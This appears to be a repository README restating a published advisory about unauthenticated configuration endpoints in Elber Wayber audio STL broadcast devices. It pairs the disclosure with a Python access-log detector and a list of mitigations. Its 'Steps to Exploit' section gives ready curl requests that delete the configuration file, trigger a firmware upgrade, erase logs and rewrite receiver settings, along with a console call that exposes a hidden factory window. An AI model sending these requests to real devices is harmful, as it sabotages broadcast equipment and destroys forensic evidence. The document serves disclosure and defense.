Elber Wayber Analog/Digital Audio STL 4.00 - Device Config Disclosure
Overview
This repository documents an unauthenticated device configuration disclosure and hidden client-side functionality in Elber Wayber Analog/Digital Audio STL 4.00: the device's /json_data/ endpoints accept state-changing requests without any authentication, and a factory window is reachable from the browser console.
- EDB-ID: 52072
- CVE: N/A
- EDB Verified: Yes
- Exploit Author: LiquidWorm
- Vendor: Elber S.r.l.
- Product Web Page: Elber S.r.l.
- Platform: Hardware
- Date: August 24, 2024
- Tested On:
  - NBFM Controller
  - embOS/IP
- Vulnerability discovered by: Gjoko 'LiquidWorm' Krstić / @zeroscience
Affected Versions
- Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501)
- Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516)
- Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516)
- Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501)
- Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350)
- Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342)
- Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131)
Vulnerability Description
Elber Wayber Analog/Digital Audio STL 4.00 suffers from unauthenticated device configuration exposure and hidden client-side functionality. The web interface's /json_data/ endpoints perform no session or credential check, so an attacker with network access to the device can change system configuration (fan thresholds, RX parameters), delete the configuration file, launch a firmware upgrade, and erase the system logs with plain unauthenticated GET requests. A hidden factory window, including an FPGA upload function, can be revealed from the browser's JavaScript console.
Impact
- Unauthorized configuration changes
- Potential system compromise
- Loss of sensitive configuration data
- Log erasure that destroys evidence and hinders forensic investigation
Steps to Exploit
1. Modify Fan Configuration
curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Response: Configuration applied
2. Delete Configuration File
curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
Response: File delete successfully
3. Initiate Firmware Upgrade
curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Response: Upgrade launched Successfully
4. Erase System Logs
curl 'http://TARGET/json_data/erase_log.js?until=-2'
Response: Logs erased
| Parameter | Meaning |
|---|---|
| until=0 | Erase all logs |
| until=-2 | Erase logs from yesterday |
| until=-8 | Erase last week's logs |
| until=-15 | Erase last two weeks' logs |
| until=-22 | Erase last three weeks' logs |
| until=-31 | Erase last month's logs |
5. Modify RX Configuration
curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
Response: RX Config Applied Successfully
6. Reveal Hidden Factory Window & FPGA Upload (browser JavaScript console, with the device web UI open)
> cleber_show_factory_wnd()
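Because the device answers these requests without any authentication, the only place to see them is in front of the device. The following is an added detection example, not code from the advisory or from Elber: it assumes the device sits behind a reverse proxy or network sensor that writes Apache/nginx combined-format access logs, and it flags hits on the state-changing /json_data/ endpoints listed in the steps above, decoding the conf_cmd and erase_log.js parameters into the meanings given in the steps and in the table. The log lines, the IP addresses and the trusted-network allowlist are constructed for illustration.

```python
"""Flag unauthenticated state-changing requests to the Elber Wayber /json_data/
endpoints in access logs (added example; not part of the original advisory).

Assumptions (not from the advisory): the device's HTTP interface is fronted by a
proxy or sensor writing combined-format access logs, and the sample lines below
are constructed.
"""
import re
from ipaddress import ip_address, ip_network
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Combined log format: ip - user [time] "METHOD target HTTP/x" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Meaning of conf_cmd's cmd parameter (advisory steps 2 and 3).
CONF_CMD = {"1": "firmware upgrade launched", "2": "configuration file deleted"}

# Meaning of erase_log.js's until parameter (advisory table).
ERASE_UNTIL = {
    "0": "all logs", "-2": "yesterday", "-8": "last week",
    "-15": "last two weeks", "-22": "last three weeks", "-31": "last month",
}

# Constructed sample log: 192.0.2.10 is a legitimate operator workstation,
# 203.0.113.7 replays the advisory's requests with curl.
SAMPLE_LOG = """\
192.0.2.10 - - [24/Aug/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Aug/2024:10:01:09 +0000] "GET /json_data/conf_cmd?index=4&cmd=2 HTTP/1.1" 200 28 "-" "curl/8.4.0"
203.0.113.7 - - [24/Aug/2024:10:01:11 +0000] "GET /json_data/erase_log.js?until=0 HTTP/1.1" 200 12 "-" "curl/8.4.0"
192.0.2.10 - - [24/Aug/2024:10:02:30 +0000] "GET /json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp= HTTP/1.1" 200 22 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Aug/2024:10:03:00 +0000] "GET /json_data/NBFMV2RX.setConfig?freq=2480000&mute=1 HTTP/1.1" 200 26 "-" "curl/8.4.0"
"""


def classify(target: str) -> Optional[str]:
    """Describe what a request target (path plus query) does to the device, or
    return None if it is not one of the /json_data/ endpoints."""
    parts = urlsplit(target)
    if not parts.path.startswith("/json_data/"):
        return None
    name = parts.path[len("/json_data/"):]
    q = parse_qs(parts.query, keep_blank_values=True)
    first = lambda k, d="": q.get(k, [d])[0]
    if name == "fan":
        return "fan speed / temperature thresholds changed"
    if name == "conf_cmd":
        cmd = first("cmd")
        return CONF_CMD.get(cmd, f"conf_cmd cmd={cmd} (unlisted)") + f" (index={first('index')})"
    if name == "erase_log.js":
        until = first("until")
        return f"logs erased ({ERASE_UNTIL.get(until, 'until=' + until)})"
    if name == "NBFMV2RX.setConfig":
        return f"RX config rewritten (freq={first('freq', '?')})"
    # Any other json_data call is still unauthenticated; report it without guessing its effect.
    return f"json_data endpoint {name} called"


def is_trusted(ip: str, trusted) -> bool:
    """True if ip falls inside one of the trusted management networks."""
    try:
        addr = ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in trusted)


def scan(log_text: str, trusted_cidrs: List[str]) -> List[Tuple[str, str, str]]:
    """Return (ip, time, description) for every /json_data/ hit from a host
    outside the trusted networks. Pass an empty allowlist to audit every host."""
    trusted = [ip_network(c) for c in trusted_cidrs]
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        desc = classify(m["target"])
        if desc is None or is_trusted(m["ip"], trusted):
            continue
        findings.append((m["ip"], m["time"], desc))
    return findings


if __name__ == "__main__":
    for ip, when, desc in scan(SAMPLE_LOG, ["192.0.2.0/24"]):
        print(f"{when} {ip}: {desc}")
```

Run against the sample, the three curl replays from the untrusted host are reported (config file deleted, all logs erased, RX config rewritten) while the operator's fan change from the allowlisted network is suppressed; because the device enforces no authentication itself, treat any such hit from an unexpected source as a confirmed change, not an attempt.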
Mitigation
To protect against this vulnerability, operators should:
- Restrict network access to the device's HTTP interface to trusted management hosts only (e.g. a firewall or a segregated management VLAN), since the device itself does not authenticate these requests.
- Place authentication and authorization in front of the sensitive /json_data/ endpoints (for example via a reverse proxy) until the vendor provides a fix.
- Apply firmware updates when available.
- Regularly review access logs at the network boundary for unexpected /json_data/ requests, because the device's own logs can be erased by the same unauthenticated requests.
References
- ExploitDB: EDB-ID 52072
- Advisory ID: ZSL-2024-5823
- Advisory URL: Zero Science Lab Advisory
Disclaimer
This repository is for educational and research purposes only. Exploiting this vulnerability on systems without authorization is illegal. The author and contributors are not responsible for any misuse of this information.